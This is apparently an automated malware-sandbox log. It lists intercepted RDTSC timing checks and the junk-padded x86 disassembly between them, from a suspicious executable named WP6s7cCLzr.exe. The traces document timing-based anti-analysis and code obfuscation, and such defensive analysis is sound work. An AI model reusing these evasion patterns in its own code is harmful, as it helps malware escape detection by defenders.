Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0F49 second address: 77A0F4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0F4F second address: 77A0F84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b pushad 0x0000000c call 00007F474CE395FFh 0x00000011 mov cx, 27DFh 0x00000015 pop esi 0x00000016 pushad 0x00000017 mov bx, 7756h 0x0000001b mov bx, B2E2h 0x0000001f popad 0x00000020 popad 0x00000021 push ebp 0x00000022 pushad 0x00000023 movzx esi, dx 0x00000026 push eax 0x00000027 push edx 0x00000028 movsx ebx, ax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1019 second address: 77A1028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1028 second address: 77A102E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A102E second address: 77A1032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1032 second address: 77A106D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b jmp 00007F474CE39607h 0x00000010 mov ecx, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F474CE39605h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A106D second address: 77A10DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474D527177h 0x00000009 sbb si, C8CEh 0x0000000e jmp 00007F474D527179h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F474D527173h 0x00000022 mov edx, 775606ECh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F474D527175h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A10DF second address: 77A111D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F474CE39607h 0x00000008 pop eax 0x00000009 mov bx, 741Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, 00000000h 0x00000015 jmp 00007F474CE39600h 0x0000001a lock cmpxchg dword ptr [edx], ecx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A111D second address: 77A116C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, 30h 0x00000008 popad 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F474D527178h 0x00000015 sbb ax, AAC8h 0x0000001a jmp 00007F474D52716Bh 0x0000001f popfd 0x00000020 mov ch, 58h 0x00000022 popad 0x00000023 popad 0x00000024 test eax, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F474D52716Eh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A116C second address: 77A117E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE395FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A117E second address: 77A11D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F47BD2656B3h 0x00000011 jmp 00007F474D527176h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 jmp 00007F474D527170h 0x0000001e mov eax, dword ptr [esi] 0x00000020 jmp 00007F474D527170h 0x00000025 mov dword ptr [edx], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A11D8 second address: 77A11DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A11DC second address: 77A11E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A11E0 second address: 77A11E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A11E6 second address: 77A1256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474D527171h 0x00000009 or ax, EEB6h 0x0000000e jmp 00007F474D527171h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+04h] 0x0000001a pushad 0x0000001b push eax 0x0000001c mov bh, 47h 0x0000001e pop ecx 0x0000001f mov bx, 79D8h 0x00000023 popad 0x00000024 mov dword ptr [edx+04h], eax 0x00000027 jmp 00007F474D527177h 0x0000002c mov eax, dword ptr [esi+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F474D527175h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1256 second address: 77A12BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007F474CE395FEh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 pushad 0x00000015 jmp 00007F474CE395FEh 0x0000001a popad 0x0000001b mov dword ptr [edx+0Ch], eax 0x0000001e pushad 0x0000001f movzx eax, di 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007F474CE39605h 0x0000002a jmp 00007F474CE395FBh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A12BA second address: 77A12CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esi+10h] 0x00000008 pushad 0x00000009 movsx edx, si 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A12CA second address: 77A1313 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 51576AFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx+10h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, BC82h 0x00000014 pushfd 0x00000015 jmp 00007F474CE39603h 0x0000001a or eax, 2FE6D77Eh 0x00000020 jmp 00007F474CE39609h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1313 second address: 77A1336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 72E7498Eh 0x00000014 mov bl, 70h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1336 second address: 77A1369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F474CE39607h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+14h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F474CE395FEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1369 second address: 77A136F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A136F second address: 77A1373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1373 second address: 77A1377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1377 second address: 77A1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movsx ebx, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1388 second address: 77A146B instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushfd 0x00000009 jmp 00007F474D527176h 0x0000000e jmp 00007F474D527175h 0x00000013 popfd 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov dword ptr [edx+18h], eax 0x00000019 jmp 00007F474D527177h 0x0000001e mov eax, dword ptr [esi+1Ch] 0x00000021 jmp 00007F474D527176h 0x00000026 mov dword ptr [edx+1Ch], eax 0x00000029 jmp 00007F474D527170h 0x0000002e mov eax, dword ptr [esi+20h] 0x00000031 pushad 0x00000032 jmp 00007F474D52716Eh 0x00000037 mov ch, 9Eh 0x00000039 popad 0x0000003a mov dword ptr [edx+20h], eax 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F474D527173h 0x00000044 add cx, C72Eh 0x00000049 jmp 00007F474D527179h 0x0000004e popfd 0x0000004f mov cx, 25B7h 0x00000053 popad 0x00000054 mov eax, dword ptr [esi+24h] 0x00000057 jmp 00007F474D52716Ah 0x0000005c mov dword ptr [edx+24h], eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A146B second address: 77A1472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 1Dh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1472 second address: 77A14A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474D52716Bh 0x00000009 add ax, 51EEh 0x0000000e jmp 00007F474D527179h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A14A2 second address: 77A14CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+28h] 0x0000000a jmp 00007F474CE395FCh 0x0000000f mov dword ptr [edx+28h], eax 0x00000012 pushad 0x00000013 jmp 00007F474CE395FEh 0x00000018 push eax 0x00000019 push edx 0x0000001a mov ebx, eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A14CE second address: 77A14FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F474D52716Ch 0x00000008 and ecx, 4452A3C8h 0x0000000e jmp 00007F474D52716Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ecx, dword ptr [esi+2Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A14FB second address: 77A14FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A14FF second address: 77A1505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1505 second address: 77A150B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A150B second address: 77A1540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 mov ax, word ptr [esi+30h] 0x00000017 jmp 00007F474D527172h 0x0000001c mov word ptr [edx+30h], ax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edi, ax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1540 second address: 77A1545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1545 second address: 77A15FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F474D52716Bh 0x00000008 pop esi 0x00000009 call 00007F474D527179h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ax, word ptr [esi+32h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F474D52716Dh 0x0000001d add si, 9906h 0x00000022 jmp 00007F474D527171h 0x00000027 popfd 0x00000028 mov ecx, 070594B7h 0x0000002d popad 0x0000002e mov word ptr [edx+32h], ax 0x00000032 jmp 00007F474D52716Ah 0x00000037 mov eax, dword ptr [esi+34h] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F474D52716Dh 0x00000043 add cx, E116h 0x00000048 jmp 00007F474D527171h 0x0000004d popfd 0x0000004e pushfd 0x0000004f jmp 00007F474D527170h 0x00000054 sub ecx, 3D1EFD38h 0x0000005a jmp 00007F474D52716Bh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1721 second address: 77A1727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1727 second address: 77A172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A172B second address: 77A172F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A172F second address: 77A1740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1740 second address: 77A174A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 709EBF77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A174A second address: 77A1750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1750 second address: 77A1754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A1754 second address: 77A179D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+40h], FFFFFFFFh 0x0000000f jmp 00007F474D527176h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F474D527177h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A179D second address: 77A17EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F474CE395FFh 0x00000009 add esi, 695AE8BEh 0x0000000f jmp 00007F474CE39609h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F474CE39603h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0D6E second address: 77F0D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, EA72h 0x00000007 mov dh, 3Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F474D52716Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77F0D8B second address: 77F0D91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901AD second address: 77901B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901B2 second address: 77901B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901B8 second address: 77901BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901BC second address: 77901CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901CB second address: 77901CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901CF second address: 77901D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901D5 second address: 77901DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901DB second address: 77901DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901DF second address: 77901E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77901E3 second address: 779022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F474CE395FFh 0x0000000e mov ebp, esp 0x00000010 jmp 00007F474CE39606h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F474CE39607h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7730011 second address: 7730016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7730016 second address: 773007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F474CE395FDh 0x0000000a sbb ah, FFFFFF96h 0x0000000d jmp 00007F474CE39601h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F474CE395FCh 0x0000001e jmp 00007F474CE39605h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F474CE39603h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 773007C second address: 7730094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D527174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7730094 second address: 7730098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7730098 second address: 77300AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F474D52716Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77300AD second address: 77300BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE395FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77300BF second address: 77300E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77300E0 second address: 77300E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7730660 second address: 7730670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D52716Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77309CF second address: 77309D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77309D4 second address: 77309E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D52716Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77309E3 second address: 77309F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx ebx, cx 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77309F8 second address: 7730A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F474D527170h 0x0000000a and cx, C138h 0x0000000f jmp 00007F474D52716Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 7730A1F second address: 7730A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 mov esi, 0E54EF6Bh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 776011A second address: 77601A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F474D52716Eh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F474D52716Eh 0x00000017 add al, FFFFFFA8h 0x0000001a jmp 00007F474D52716Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov ch, 70h 0x00000025 mov ax, bx 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a jmp 00007F474D527179h 0x0000002f xchg eax, edi 0x00000030 jmp 00007F474D52716Eh 0x00000035 push eax 0x00000036 pushad 0x00000037 mov ecx, ebx 0x00000039 mov cx, bx 0x0000003c popad 0x0000003d xchg eax, edi 0x0000003e jmp 00007F474D52716Fh 0x00000043 mov edi, dword ptr [ebp+08h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77601A5 second address: 77601A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77601A9 second address: 77601C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
